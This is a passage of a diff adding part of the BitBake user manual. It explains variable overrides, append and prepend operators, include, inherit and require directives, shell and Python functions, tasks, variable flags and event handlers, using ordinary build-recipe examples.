+ the "os" override to the variable (i.e. ``TEST_os``).
+
+ To better understand this, consider a practical example that assumes
+ an OpenEmbedded metadata-based Linux kernel recipe file. The
+ following lines from the recipe file first set the kernel branch
+ variable ``KBRANCH`` to a default value, then conditionally override
+ that value based on the architecture of the build: ::
+
+ KBRANCH = "standard/base"
+ KBRANCH_qemuarm = "standard/arm-versatile-926ejs"
+ KBRANCH_qemumips = "standard/mti-malta32"
+ KBRANCH_qemuppc = "standard/qemuppc"
+ KBRANCH_qemux86 = "standard/common-pc/base"
+ KBRANCH_qemux86-64 = "standard/common-pc-64/base"
+ KBRANCH_qemumips64 = "standard/mti-malta64"
+
+- *Appending and Prepending:* BitBake also supports append and prepend
+ operations to variable values based on whether a specific item is
+ listed in ``OVERRIDES``. Here is an example: ::
+
+ DEPENDS = "glibc ncurses"
+ OVERRIDES = "machine:local"
+ DEPENDS_append_machine = "libmad"
+
+ In this example, ``DEPENDS`` becomes "glibc ncurses libmad".
+
+ Again, using an OpenEmbedded metadata-based kernel recipe file as an
+ example, the following lines will conditionally append to the
+ ``KERNEL_FEATURES`` variable based on the architecture: ::
+
+ KERNEL_FEATURES_append = " ${KERNEL_EXTRA_FEATURES}"
+ KERNEL_FEATURES_append_qemux86=" cfg/sound.scc cfg/paravirt_kvm.scc"
+ KERNEL_FEATURES_append_qemux86-64=" cfg/sound.scc cfg/paravirt_kvm.scc"
+
+- *Setting a Variable for a Single Task:* BitBake supports setting a
+ variable just for the duration of a single task. Here is an example: ::
+
+ FOO_task-configure = "val 1"
+ FOO_task-compile = "val 2"
+
+ In the
+ previous example, ``FOO`` has the value "val 1" while the
+ ``do_configure`` task is executed, and the value "val 2" while the
+ ``do_compile`` task is executed.
+
+ Internally, this is implemented by prepending the task (e.g.
+ "task-compile:") to the value of
+ :term:`OVERRIDES` for the local datastore of the
+ ``do_compile`` task.
+
+ You can also use this syntax with other combinations (e.g.
+ "``_prepend``") as shown in the following example: ::
+
+ EXTRA_OEMAKE_prepend_task-compile = "${PARALLEL_MAKE} "
+
+Key Expansion
+-------------
+
+Key expansion happens when the BitBake datastore is finalized. To better
+understand this, consider the following example: ::
+
+ A${B} = "X"
+ B = "2"
+ A2 = "Y"
+
+In this case, after all the parsing is complete, BitBake expands
+``${B}`` into "2". This expansion causes ``A2``, which was set to "Y"
+before the expansion, to become "X".
+
+.. _variable-interaction-worked-examples:
+
+Examples
+--------
+
+Despite the previous explanations that show the different forms of
+variable definitions, it can be hard to work out exactly what happens
+when variable operators, conditional overrides, and unconditional
+overrides are combined. This section presents some common scenarios
+along with explanations for variable interactions that typically confuse
+users.
+
+There is often confusion concerning the order in which overrides and
+various "append" operators take effect. Recall that an append or prepend
+operation using "_append" and "_prepend" does not result in an immediate
+assignment as would "+=", ".=", "=+", or "=.". Consider the following
+example: ::
+
+ OVERRIDES = "foo"
+ A = "Z"
+ A_foo_append = "X"
+
+For this case,
+``A`` is unconditionally set to "Z" and "X" is unconditionally and
+immediately appended to the variable ``A_foo``. Because overrides have
+not been applied yet, ``A_foo`` is set to "X" due to the append and
+``A`` simply equals "Z".
+
+Applying overrides, however, changes things. Since "foo" is listed in
+``OVERRIDES``, the conditional variable ``A`` is replaced with the "foo"
+version, which is equal to "X". So effectively, ``A_foo`` replaces
+``A``.
+
+This next example changes the order of the override and the append: ::
+
+ OVERRIDES = "foo"
+ A = "Z"
+ A_append_foo = "X"
+
+For this case, before
+overrides are handled, ``A`` is set to "Z" and ``A_append_foo`` is set
+to "X". Once the override for "foo" is applied, however, ``A`` gets
+appended with "X". Consequently, ``A`` becomes "ZX". Notice that spaces
+are not appended.
+
+This next example has the order of the appends and overrides reversed
+back as in the first example: ::
+
+ OVERRIDES = "foo"
+ A = "Y"
+ A_foo_append = "Z"
+ A_foo_append = "X"
+
+For this case, before any overrides are resolved,
+``A`` is set to "Y" using an immediate assignment. After this immediate
+assignment, ``A_foo`` is set to "Z", and then further appended with "X"
+leaving the variable set to "ZX". Finally, applying the override for
+"foo" results in the conditional variable ``A`` becoming "ZX" (i.e.
+``A`` is replaced with ``A_foo``).
+
+This final example mixes in some varying operators: ::
+
+ A = "1"
+ A_append = "2"
+ A_append = "3"
+ A += "4"
+ A .= "5"
+
+For this case, the type of append
+operators are affecting the order of assignments as BitBake passes
+through the code multiple times. Initially, ``A`` is set to "1 45"
+because of the three statements that use immediate operators. After
+these assignments are made, BitBake applies the "_append" operations.
+Those operations result in ``A`` becoming "1 4523".
+
+Sharing Functionality
+=====================
+
+BitBake allows for metadata sharing through include files (``.inc``) and
+class files (``.bbclass``). For example, suppose you have a piece of
+common functionality such as a task definition that you want to share
+between more than one recipe. In this case, creating a ``.bbclass`` file
+that contains the common functionality and then using the ``inherit``
+directive in your recipes to inherit the class would be a common way to
+share the task.
+
+This section presents the mechanisms BitBake provides to allow you to
+share functionality between recipes. Specifically, the mechanisms
+include ``include``, ``inherit``, ``INHERIT``, and ``require``
+directives.
+
+Locating Include and Class Files
+--------------------------------
+
+BitBake uses the :term:`BBPATH` variable to locate
+needed include and class files. Additionally, BitBake searches the
+current directory for ``include`` and ``require`` directives.
+
+.. note::
+
+ The BBPATH variable is analogous to the environment variable PATH .
+
+In order for include and class files to be found by BitBake, they need
+to be located in a "classes" subdirectory that can be found in
+``BBPATH``.
+
+``inherit`` Directive
+---------------------
+
+When writing a recipe or class file, you can use the ``inherit``
+directive to inherit the functionality of a class (``.bbclass``).
+BitBake only supports this directive when used within recipe and class
+files (i.e. ``.bb`` and ``.bbclass``).
+
+The ``inherit`` directive is a rudimentary means of specifying
+functionality contained in class files that your recipes require. For
+example, you can easily abstract out the tasks involved in building a
+package that uses Autoconf and Automake and put those tasks into a class
+file and then have your recipe inherit that class file.
+
+As an example, your recipes could use the following directive to inherit
+an ``autotools.bbclass`` file. The class file would contain common
+functionality for using Autotools that could be shared across recipes: ::
+
+ inherit autotools
+
+In this case, BitBake would search for the directory
+``classes/autotools.bbclass`` in ``BBPATH``.
+
+.. note::
+
+ You can override any values and functions of the inherited class
+ within your recipe by doing so after the "inherit" statement.
+
+If you want to use the directive to inherit multiple classes, separate
+them with spaces. The following example shows how to inherit both the
+``buildhistory`` and ``rm_work`` classes: ::
+
+ inherit buildhistory rm_work
+
+An advantage with the inherit directive as compared to both the
+:ref:`include <bitbake-user-manual/bitbake-user-manual-metadata:\`\`include\`\` directive>` and :ref:`require <bitbake-user-manual/bitbake-user-manual-metadata:\`\`require\`\` directive>`
+directives is that you can inherit class files conditionally. You can
+accomplish this by using a variable expression after the ``inherit``
+statement. Here is an example: ::
+
+ inherit ${VARNAME}
+
+If ``VARNAME`` is
+going to be set, it needs to be set before the ``inherit`` statement is
+parsed. One way to achieve a conditional inherit in this case is to use
+overrides: ::
+
+ VARIABLE = ""
+ VARIABLE_someoverride = "myclass"
+
+Another method is by using anonymous Python. Here is an example: ::
+
+ python () {
+ if condition == value:
+ d.setVar('VARIABLE', 'myclass')
+ else:
+ d.setVar('VARIABLE', '')
+ }
+
+Alternatively, you could use an in-line Python expression in the
+following form: ::
+
+ inherit ${@'classname' if condition else ''}
+ inherit ${@functionname(params)}
+
+In all cases, if the expression evaluates to an
+empty string, the statement does not trigger a syntax error because it
+becomes a no-op.
+
+``include`` Directive
+---------------------
+
+BitBake understands the ``include`` directive. This directive causes
+BitBake to parse whatever file you specify, and to insert that file at
+that location. The directive is much like its equivalent in Make except
+that if the path specified on the include line is a relative path,
+BitBake locates the first file it can find within ``BBPATH``.
+
+The include directive is a more generic method of including
+functionality as compared to the :ref:`inherit <bitbake-user-manual/bitbake-user-manual-metadata:\`\`inherit\`\` directive>`
+directive, which is restricted to class (i.e. ``.bbclass``) files. The
+include directive is applicable for any other kind of shared or
+encapsulated functionality or configuration that does not suit a
+``.bbclass`` file.
+
+As an example, suppose you needed a recipe to include some self-test
+definitions: ::
+
+ include test_defs.inc
+
+.. note::
+
+ The include directive does not produce an error when the file cannot be
+ found. Consequently, it is recommended that if the file you are including is
+ expected to exist, you should use :ref:`require <require-inclusion>` instead
+ of include . Doing so makes sure that an error is produced if the file cannot
+ be found.
+
+.. _require-inclusion:
+
+``require`` Directive
+---------------------
+
+BitBake understands the ``require`` directive. This directive behaves
+just like the ``include`` directive with the exception that BitBake
+raises a parsing error if the file to be included cannot be found. Thus,
+any file you require is inserted into the file that is being parsed at
+the location of the directive.
+
+The require directive, like the include directive previously described,
+is a more generic method of including functionality as compared to the
+:ref:`inherit <bitbake-user-manual/bitbake-user-manual-metadata:\`\`inherit\`\` directive>` directive, which is restricted to class
+(i.e. ``.bbclass``) files. The require directive is applicable for any
+other kind of shared or encapsulated functionality or configuration that
+does not suit a ``.bbclass`` file.
+
+Similar to how BitBake handles :ref:`include <bitbake-user-manual/bitbake-user-manual-metadata:\`\`include\`\` directive>`, if
+the path specified on the require line is a relative path, BitBake
+locates the first file it can find within ``BBPATH``.
+
+As an example, suppose you have two versions of a recipe (e.g.
+``foo_1.2.2.bb`` and ``foo_2.0.0.bb``) where each version contains some
+identical functionality that could be shared. You could create an
+include file named ``foo.inc`` that contains the common definitions
+needed to build "foo". You need to be sure ``foo.inc`` is located in the
+same directory as your two recipe files as well. Once these conditions
+are set up, you can share the functionality using a ``require``
+directive from within each recipe: ::
+
+ require foo.inc
+
+``INHERIT`` Configuration Directive
+-----------------------------------
+
+When creating a configuration file (``.conf``), you can use the
+:term:`INHERIT` configuration directive to inherit a
+class. BitBake only supports this directive when used within a
+configuration file.
+
+As an example, suppose you needed to inherit a class file called
+``abc.bbclass`` from a configuration file as follows: ::
+
+ INHERIT += "abc"
+
+This configuration directive causes the named class to be inherited at
+the point of the directive during parsing. As with the ``inherit``
+directive, the ``.bbclass`` file must be located in a "classes"
+subdirectory in one of the directories specified in ``BBPATH``.
+
+.. note::
+
+ Because .conf files are parsed first during BitBake's execution, using
+ INHERIT to inherit a class effectively inherits the class globally (i.e. for
+ all recipes).
+
+If you want to use the directive to inherit multiple classes, you can
+provide them on the same line in the ``local.conf`` file. Use spaces to
+separate the classes. The following example shows how to inherit both
+the ``autotools`` and ``pkgconfig`` classes: ::
+
+ INHERIT += "autotools pkgconfig"
+
+Functions
+=========
+
+As with most languages, functions are the building blocks that are used
+to build up operations into tasks. BitBake supports these types of
+functions:
+
+- *Shell Functions:* Functions written in shell script and executed
+ either directly as functions, tasks, or both. They can also be called
+ by other shell functions.
+
+- *BitBake-Style Python Functions:* Functions written in Python and
+ executed by BitBake or other Python functions using
+ ``bb.build.exec_func()``.
+
+- *Python Functions:* Functions written in Python and executed by
+ Python.
+
+- *Anonymous Python Functions:* Python functions executed automatically
+ during parsing.
+
+Regardless of the type of function, you can only define them in class
+(``.bbclass``) and recipe (``.bb`` or ``.inc``) files.
+
+Shell Functions
+---------------
+
+Functions written in shell script and executed either directly as
+functions, tasks, or both. They can also be called by other shell
+functions. Here is an example shell function definition: ::
+
+ some_function () {
+ echo "Hello World"
+ }
+
+When you create these types of functions in
+your recipe or class files, you need to follow the shell programming
+rules. The scripts are executed by ``/bin/sh``, which may not be a bash
+shell but might be something such as ``dash``. You should not use
+Bash-specific script (bashisms).
+
+Overrides and override-style operators like ``_append`` and ``_prepend``
+can also be applied to shell functions. Most commonly, this application
+would be used in a ``.bbappend`` file to modify functions in the main
+recipe. It can also be used to modify functions inherited from classes.
+
+As an example, consider the following: ::
+
+ do_foo() {
+ bbplain first
+ fn
+ }
+
+ fn_prepend() {
+ bbplain second
+ }
+
+ fn() {
+ bbplain third
+ }
+
+ do_foo_append() {
+ bbplain fourth
+ }
+
+Running ``do_foo`` prints the following: ::
+
+ recipename do_foo: first
+ recipename do_foo: second
+ recipename do_foo: third
+ recipename do_foo: fourth
+
+.. note::
+
+ Overrides and override-style operators can be applied to any shell
+ function, not just :ref:`tasks <bitbake-user-manual/bitbake-user-manual-metadata:tasks>`.
+
+You can use the ``bitbake -e`` recipename command to view the final
+assembled function after all overrides have been applied.
+
+BitBake-Style Python Functions
+------------------------------
+
+These functions are written in Python and executed by BitBake or other
+Python functions using ``bb.build.exec_func()``.
+
+An example BitBake function is: ::
+
+ python some_python_function () {
+ d.setVar("TEXT", "Hello World")
+ print d.getVar("TEXT")
+ }
+
+Because the
+Python "bb" and "os" modules are already imported, you do not need to
+import these modules. Also in these types of functions, the datastore
+("d") is a global variable and is always automatically available.
+
+.. note::
+
+ Variable expressions (e.g. ``${X}`` ) are no longer expanded within Python
+ functions. This behavior is intentional in order to allow you to freely set
+ variable values to expandable expressions without having them expanded
+ prematurely. If you do wish to expand a variable within a Python function,
+ use ``d.getVar("X")`` . Or, for more complicated expressions, use ``d.expand()``.
+
+Similar to shell functions, you can also apply overrides and
+override-style operators to BitBake-style Python functions.
+
+As an example, consider the following: ::
+
+ python do_foo_prepend() {
+ bb.plain("first")
+ }
+
+ python do_foo() {
+ bb.plain("second")
+ }
+
+ python do_foo_append() {
+ bb.plain("third")
+ }
+
+Running ``do_foo`` prints the following: ::
+
+ recipename do_foo: first
+ recipename do_foo: second
+ recipename do_foo: third
+
+You can use the ``bitbake -e`` recipename command to view
+the final assembled function after all overrides have been applied.
+
+Python Functions
+----------------
+
+These functions are written in Python and are executed by other Python
+code. Examples of Python functions are utility functions that you intend
+to call from in-line Python or from within other Python functions. Here
+is an example: ::
+
+ def get_depends(d):
+ if d.getVar('SOMECONDITION'):
+ return "dependencywithcond"
+ else:
+ return "dependency"
+
+ SOMECONDITION = "1"
+ DEPENDS = "${@get_depends(d)}"
+
+This would result in ``DEPENDS`` containing ``dependencywithcond``.
+
+Here are some things to know about Python functions:
+
+- Python functions can take parameters.
+
+- The BitBake datastore is not automatically available. Consequently,
+ you must pass it in as a parameter to the function.
+
+- The "bb" and "os" Python modules are automatically available. You do
+ not need to import them.
+
+BitBake-Style Python Functions Versus Python Functions
+------------------------------------------------------
+
+Following are some important differences between BitBake-style Python
+functions and regular Python functions defined with "def":
+
+- Only BitBake-style Python functions can be :ref:`tasks <bitbake-user-manual/bitbake-user-manual-metadata:tasks>`.
+
+- Overrides and override-style operators can only be applied to
+ BitBake-style Python functions.
+
+- Only regular Python functions can take arguments and return values.
+
+- :ref:`Variable flags <bitbake-user-manual/bitbake-user-manual-metadata:variable flags>` such as
+ ``[dirs]``, ``[cleandirs]``, and ``[lockfiles]`` can be used on BitBake-style
+ Python functions, but not on regular Python functions.
+
+- BitBake-style Python functions generate a separate
+ ``${``\ :term:`T`\ ``}/run.``\ function-name\ ``.``\ pid
+ script that is executed to run the function, and also generate a log
+ file in ``${T}/log.``\ function-name\ ``.``\ pid if they are executed
+ as tasks.
+
+ Regular Python functions execute "inline" and do not generate any
+ files in ``${T}``.
+
+- Regular Python functions are called with the usual Python syntax.
+ BitBake-style Python functions are usually tasks and are called
+ directly by BitBake, but can also be called manually from Python code
+ by using the ``bb.build.exec_func()`` function. Here is an example: ::
+
+ bb.build.exec_func("my_bitbake_style_function", d)
+
+ .. note::
+
+ ``bb.build.exec_func()`` can also be used to run shell functions from Python
+ code. If you want to run a shell function before a Python function within
+ the same task, then you can use a parent helper Python function that
+ starts by running the shell function with ``bb.build.exec_func()`` and then
+ runs the Python code.
+
+ To detect errors from functions executed with
+ ``bb.build.exec_func()``, you can catch the ``bb.build.FuncFailed``
+ exception.
+
+ .. note::
+
+ Functions in metadata (recipes and classes) should not themselves raise
+ ``bb.build.FuncFailed``. Rather, ``bb.build.FuncFailed`` should be viewed as a
+ general indicator that the called function failed by raising an
+ exception. For example, an exception raised by ``bb.fatal()`` will be caught
+ inside ``bb.build.exec_func()``, and a ``bb.build.FuncFailed`` will be raised in
+ response.
+
+Due to their simplicity, you should prefer regular Python functions over
+BitBake-style Python functions unless you need a feature specific to
+BitBake-style Python functions. Regular Python functions in metadata are
+a more recent invention than BitBake-style Python functions, and older
+code tends to use ``bb.build.exec_func()`` more often.
+
+Anonymous Python Functions
+--------------------------
+
+Sometimes it is useful to set variables or perform other operations
+programmatically during parsing. To do this, you can define special
+Python functions, called anonymous Python functions, that run at the end
+of parsing. For example, the following conditionally sets a variable
+based on the value of another variable: ::
+
+ python () {
+ if d.getVar('SOMEVAR') == 'value':
+ d.setVar('ANOTHERVAR', 'value2')
+ }
+
+An equivalent way to mark a function as an anonymous function is to give it
+the name "__anonymous", rather than no name.
+
+Anonymous Python functions always run at the end of parsing, regardless
+of where they are defined. If a recipe contains many anonymous
+functions, they run in the same order as they are defined within the
+recipe. As an example, consider the following snippet: ::
+
+ python () {
+ d.setVar('FOO', 'foo 2')
+ }
+
+ FOO = "foo 1"
+
+ python () {
+ d.appendVar('BAR',' bar 2')
+ }
+
+ BAR = "bar 1"
+
+The previous example is conceptually
+equivalent to the following snippet: ::
+
+ FOO = "foo 1"
+ BAR = "bar 1"
+ FOO = "foo 2"
+ BAR += "bar 2"
+
+``FOO`` ends up with the value "foo 2", and
+``BAR`` with the value "bar 1 bar 2". Just as in the second snippet, the
+values set for the variables within the anonymous functions become
+available to tasks, which always run after parsing.
+
+Overrides and override-style operators such as "``_append``" are applied
+before anonymous functions run. In the following example, ``FOO`` ends
+up with the value "foo from anonymous": ::
+
+ FOO = "foo"
+ FOO_append = " from outside"
+
+ python () {
+ d.setVar("FOO", "foo from anonymous")
+ }
+
+For methods
+you can use with anonymous Python functions, see the
+":ref:`bitbake-user-manual/bitbake-user-manual-metadata:functions you can call from within python`"
+section. For a different method to run Python code during parsing, see
+the ":ref:`bitbake-user-manual/bitbake-user-manual-metadata:inline python variable expansion`" section.
+
+Flexible Inheritance for Class Functions
+----------------------------------------
+
+Through coding techniques and the use of ``EXPORT_FUNCTIONS``, BitBake
+supports exporting a function from a class such that the class function
+appears as the default implementation of the function, but can still be
+called if a recipe inheriting the class needs to define its own version
+of the function.
+
+To understand the benefits of this feature, consider the basic scenario
+where a class defines a task function and your recipe inherits the
+class. In this basic scenario, your recipe inherits the task function as
+defined in the class. If desired, your recipe can add to the start and
+end of the function by using the "_prepend" or "_append" operations
+respectively, or it can redefine the function completely. However, if it
+redefines the function, there is no means for it to call the class
+version of the function. ``EXPORT_FUNCTIONS`` provides a mechanism that
+enables the recipe's version of the function to call the original
+version of the function.
+
+To make use of this technique, you need the following things in place:
+
+- The class needs to define the function as follows: ::
+
+ classname_functionname
+
+ For example, if you have a class file
+ ``bar.bbclass`` and a function named ``do_foo``, the class must
+ define the function as follows: ::
+
+ bar_do_foo
+
+- The class needs to contain the ``EXPORT_FUNCTIONS`` statement as
+ follows: ::
+
+ EXPORT_FUNCTIONS functionname
+
+ For example, continuing with
+ the same example, the statement in the ``bar.bbclass`` would be as
+ follows: ::
+
+ EXPORT_FUNCTIONS do_foo
+
+- You need to call the function appropriately from within your recipe.
+ Continuing with the same example, if your recipe needs to call the
+ class version of the function, it should call ``bar_do_foo``.
+ Assuming ``do_foo`` was a shell function and ``EXPORT_FUNCTIONS`` was
+ used as above, the recipe's function could conditionally call the
+ class version of the function as follows: ::
+
+ do_foo() {
+ if [ somecondition ] ; then
+ bar_do_foo
+ else
+ # Do something else
+ fi
+ }
+
+ To call your modified version of the function as defined in your recipe,
+ call it as ``do_foo``.
+
+With these conditions met, your single recipe can freely choose between
+the original function as defined in the class file and the modified
+function in your recipe. If you do not set up these conditions, you are
+limited to using one function or the other.
+
+Tasks
+=====
+
+Tasks are BitBake execution units that make up the steps that BitBake
+can run for a given recipe. Tasks are only supported in recipes and
+classes (i.e. in ``.bb`` files and files included or inherited from
+``.bb`` files). By convention, tasks have names that start with "do\_".
+
+Promoting a Function to a Task
+------------------------------
+
+Tasks are either :ref:`shell functions <bitbake-user-manual/bitbake-user-manual-metadata:shell functions>` or
+:ref:`BitBake-style Python functions <bitbake-user-manual/bitbake-user-manual-metadata:bitbake-style python functions>`
+that have been promoted to tasks by using the ``addtask`` command. The
+``addtask`` command can also optionally describe dependencies between
+the task and other tasks. Here is an example that shows how to define a
+task and declare some dependencies: ::
+
+ python do_printdate () {
+ import time
+ print time.strftime('%Y%m%d', time.gmtime())
+ }
+ addtask printdate after do_fetch before do_build
+
+The first argument to ``addtask`` is the name
+of the function to promote to a task. If the name does not start with
+"do\_", "do\_" is implicitly added, which enforces the convention that all
+task names start with "do\_".
+
+In the previous example, the ``do_printdate`` task becomes a dependency
+of the ``do_build`` task, which is the default task (i.e. the task run
+by the ``bitbake`` command unless another task is specified explicitly).
+Additionally, the ``do_printdate`` task becomes dependent upon the
+``do_fetch`` task. Running the ``do_build`` task results in the
+``do_printdate`` task running first.
+
+.. note::
+
+ If you try out the previous example, you might see that the
+ ``do_printdate``
+ task is only run the first time you build the recipe with the
+ ``bitbake``
+ command. This is because BitBake considers the task "up-to-date"
+ after that initial run. If you want to force the task to always be
+ rerun for experimentation purposes, you can make BitBake always
+ consider the task "out-of-date" by using the
+ :ref:`[nostamp] <bitbake-user-manual/bitbake-user-manual-metadata:Variable Flags>`
+ variable flag, as follows: ::
+
+ do_printdate[nostamp] = "1"
+
+ You can also explicitly run the task and provide the
+ -f option as follows: ::
+
+ $ bitbake recipe -c printdate -f
+
+ When manually selecting a task to run with the bitbake ``recipe
+ -c task`` command, you can omit the "do\_" prefix as part of the task
+ name.
+
+You might wonder about the practical effects of using ``addtask``
+without specifying any dependencies as is done in the following example: ::
+
+ addtask printdate
+
+In this example, assuming dependencies have not been
+added through some other means, the only way to run the task is by
+explicitly selecting it with ``bitbake`` recipe ``-c printdate``. You
+can use the ``do_listtasks`` task to list all tasks defined in a recipe
+as shown in the following example: ::
+
+ $ bitbake recipe -c listtasks
+
+For more information on task dependencies, see the
+":ref:`bitbake-user-manual/bitbake-user-manual-execution:dependencies`" section.
+
+See the ":ref:`bitbake-user-manual/bitbake-user-manual-metadata:variable flags`" section for information
+on variable flags you can use with tasks.
+
+Deleting a Task
+---------------
+
+As well as being able to add tasks, you can delete them. Simply use the
+``deltask`` command to delete a task. For example, to delete the example
+task used in the previous sections, you would use: ::
+
+ deltask printdate
+
+If you delete a task using the ``deltask`` command and the task has
+dependencies, the dependencies are not reconnected. For example, suppose
+you have three tasks named ``do_a``, ``do_b``, and ``do_c``.
+Furthermore, ``do_c`` is dependent on ``do_b``, which in turn is
+dependent on ``do_a``. Given this scenario, if you use ``deltask`` to
+delete ``do_b``, the implicit dependency relationship between ``do_c``
+and ``do_a`` through ``do_b`` no longer exists, and ``do_c``
+dependencies are not updated to include ``do_a``. Thus, ``do_c`` is free
+to run before ``do_a``.
+
+If you want dependencies such as these to remain intact, use the
+``[noexec]`` varflag to disable the task instead of using the
+``deltask`` command to delete it: ::
+
+ do_b[noexec] = "1"
+
+Passing Information Into the Build Task Environment
+---------------------------------------------------
+
+When running a task, BitBake tightly controls the shell execution
+environment of the build tasks to make sure unwanted contamination from
+the build machine cannot influence the build.
+
+.. note::
+
+ By default, BitBake cleans the environment to include only those
+ things exported or listed in its whitelist to ensure that the build
+ environment is reproducible and consistent. You can prevent this
+ "cleaning" by setting the :term:`BB_PRESERVE_ENV` variable.
+
+Consequently, if you do want something to get passed into the build task
+environment, you must take these two steps:
+
+#. Tell BitBake to load what you want from the environment into the
+ datastore. You can do so through the
+ :term:`BB_ENV_WHITELIST` and
+ :term:`BB_ENV_EXTRAWHITE` variables. For
+ example, assume you want to prevent the build system from accessing
+ your ``$HOME/.ccache`` directory. The following command "whitelists"
+ the environment variable ``CCACHE_DIR`` causing BitBake to allow that
+ variable into the datastore: ::
+
+ export BB_ENV_EXTRAWHITE="$BB_ENV_EXTRAWHITE CCACHE_DIR"
+
+#. Tell BitBake to export what you have loaded into the datastore to the
+ task environment of every running task. Loading something from the
+ environment into the datastore (previous step) only makes it
+ available in the datastore. To export it to the task environment of
+ every running task, use a command similar to the following in your
+ local configuration file ``local.conf`` or your distribution
+ configuration file: ::
+
+ export CCACHE_DIR
+
+ .. note::
+
+ A side effect of the previous steps is that BitBake records the
+ variable as a dependency of the build process in things like the
+ setscene checksums. If doing so results in unnecessary rebuilds of
+ tasks, you can whitelist the variable so that the setscene code
+ ignores the dependency when it creates checksums.
+
+Sometimes, it is useful to be able to obtain information from the
+original execution environment. BitBake saves a copy of the original
+environment into a special variable named :term:`BB_ORIGENV`.
+
+The ``BB_ORIGENV`` variable returns a datastore object that can be
+queried using the standard datastore operators such as
+``getVar(, False)``. The datastore object is useful, for example, to
+find the original ``DISPLAY`` variable. Here is an example: ::
+
+ origenv = d.getVar("BB_ORIGENV", False)
+ bar = origenv.getVar("BAR", False)
+
+The previous example returns ``BAR`` from the original execution
+environment.
+
+Variable Flags
+==============
+
+Variable flags (varflags) help control a task's functionality and
+dependencies. BitBake reads and writes varflags to the datastore using
+the following command forms: ::
+
+ variable = d.getVarFlags("variable")
+ self.d.setVarFlags("FOO", {"func": True})
+
+When working with varflags, the same syntax, with the exception of
+overrides, applies. In other words, you can set, append, and prepend
+varflags just like variables. See the
+":ref:`bitbake-user-manual/bitbake-user-manual-metadata:variable flag syntax`" section for details.
+
+BitBake has a defined set of varflags available for recipes and classes.
+Tasks support a number of these flags which control various
+functionality of the task:
+
+- ``[cleandirs]``: Empty directories that should be created before
+ the task runs. Directories that already exist are removed and
+ recreated to empty them.
+
+- ``[depends]``: Controls inter-task dependencies. See the
+ :term:`DEPENDS` variable and the
+ ":ref:`bitbake-user-manual/bitbake-user-manual-metadata:inter-task
+ dependencies`" section for more information.
+
+- ``[deptask]``: Controls task build-time dependencies. See the
+ :term:`DEPENDS` variable and the ":ref:`bitbake-user-manual/bitbake-user-manual-metadata:build dependencies`" section for more information.
+
+- ``[dirs]``: Directories that should be created before the task
+ runs. Directories that already exist are left as is. The last
+ directory listed is used as the current working directory for the
+ task.
+
+- ``[lockfiles]``: Specifies one or more lockfiles to lock while the
+ task executes. Only one task may hold a lockfile, and any task that
+ attempts to lock an already locked file will block until the lock is
+ released. You can use this variable flag to accomplish mutual
+ exclusion.
+
+- ``[noexec]``: When set to "1", marks the task as being empty, with
+ no execution required. You can use the ``[noexec]`` flag to set up
+ tasks as dependency placeholders, or to disable tasks defined
+ elsewhere that are not needed in a particular recipe.
+
+- ``[nostamp]``: When set to "1", tells BitBake to not generate a
+ stamp file for a task, which implies the task should always be
+ executed.
+
+ .. caution::
+
+ Any task that depends (possibly indirectly) on a ``[nostamp]`` task will
+ always be executed as well. This can cause unnecessary rebuilding if you
+ are not careful.
+
+- ``[number_threads]``: Limits tasks to a specific number of
+ simultaneous threads during execution. This varflag is useful when
+ your build host has a large number of cores but certain tasks need to
+ be rate-limited due to various kinds of resource constraints (e.g. to
+ avoid network throttling). ``number_threads`` works similarly to the
+ :term:`BB_NUMBER_THREADS` variable but is task-specific.
+
+ Set the value globally. For example, the following makes sure the
+ ``do_fetch`` task uses no more than two simultaneous execution
+ threads: do_fetch[number_threads] = "2"
+
+ .. warning::
+
+ - Setting the varflag in individual recipes rather than globally
+ can result in unpredictable behavior.
+
+ - Setting the varflag to a value greater than the value used in
+ the ``BB_NUMBER_THREADS`` variable causes ``number_threads`` to
+ have no effect.
+
+- ``[postfuncs]``: List of functions to call after the completion of
+ the task.
+
+- ``[prefuncs]``: List of functions to call before the task executes.
+
+- ``[rdepends]``: Controls inter-task runtime dependencies. See the
+ :term:`RDEPENDS` variable, the
+ :term:`RRECOMMENDS` variable, and the
+ ":ref:`bitbake-user-manual/bitbake-user-manual-metadata:inter-task dependencies`" section for
+ more information.
+
+- ``[rdeptask]``: Controls task runtime dependencies. See the
+ :term:`RDEPENDS` variable, the
+ :term:`RRECOMMENDS` variable, and the
+ ":ref:`bitbake-user-manual/bitbake-user-manual-metadata:runtime dependencies`" section for more
+ information.
+
+- ``[recideptask]``: When set in conjunction with ``recrdeptask``,
+ specifies a task that should be inspected for additional
+ dependencies.
+
+- ``[recrdeptask]``: Controls task recursive runtime dependencies.
+ See the :term:`RDEPENDS` variable, the
+ :term:`RRECOMMENDS` variable, and the
+ ":ref:`bitbake-user-manual/bitbake-user-manual-metadata:recursive dependencies`" section for
+ more information.
+
+- ``[stamp-extra-info]``: Extra stamp information to append to the
+ task's stamp. As an example, OpenEmbedded uses this flag to allow
+ machine-specific tasks.
+
+- ``[umask]``: The umask to run the task under.
+
+Several varflags are useful for controlling how signatures are
+calculated for variables. For more information on this process, see the
+":ref:`bitbake-user-manual/bitbake-user-manual-execution:checksums (signatures)`" section.
+
+- ``[vardeps]``: Specifies a space-separated list of additional
+ variables to add to a variable's dependencies for the purposes of
+ calculating its signature. Adding variables to this list is useful,
+ for example, when a function refers to a variable in a manner that
+ does not allow BitBake to automatically determine that the variable
+ is referred to.
+
+- ``[vardepsexclude]``: Specifies a space-separated list of variables
+ that should be excluded from a variable's dependencies for the
+ purposes of calculating its signature.
+
+- ``[vardepvalue]``: If set, instructs BitBake to ignore the actual
+ value of the variable and instead use the specified value when
+ calculating the variable's signature.
+
+- ``[vardepvalueexclude]``: Specifies a pipe-separated list of
+ strings to exclude from the variable's value when calculating the
+ variable's signature.
+
+Events
+======
+
+BitBake allows installation of event handlers within recipe and class
+files. Events are triggered at certain points during operation, such as
+the beginning of operation against a given recipe (i.e. ``*.bb``), the
+start of a given task, a task failure, a task success, and so forth. The
+intent is to make it easy to do things like email notification on build
+failures.
+
+Following is an example event handler that prints the name of the event
+and the content of the ``FILE`` variable: ::
+
+ addhandler myclass_eventhandler
+ python myclass_eventhandler() {
+ from bb.event import getName
+ print("The name of the Event is %s" % getName(e))
+ print("The file we run for is %s" % d.getVar('FILE'))
+ }
+ myclass_eventhandler[eventmask] = "bb.event.BuildStarted
+ bb.event.BuildCompleted"
+
+In the previous example, an eventmask has been
+set so that the handler only sees the "BuildStarted" and
+"BuildCompleted" events. This event handler gets called every time an
+event matching the eventmask is triggered. A global variable "e" is
+defined, which represents the current event. With the ``getName(e)``
+method, you can get the name of the triggered event. The global
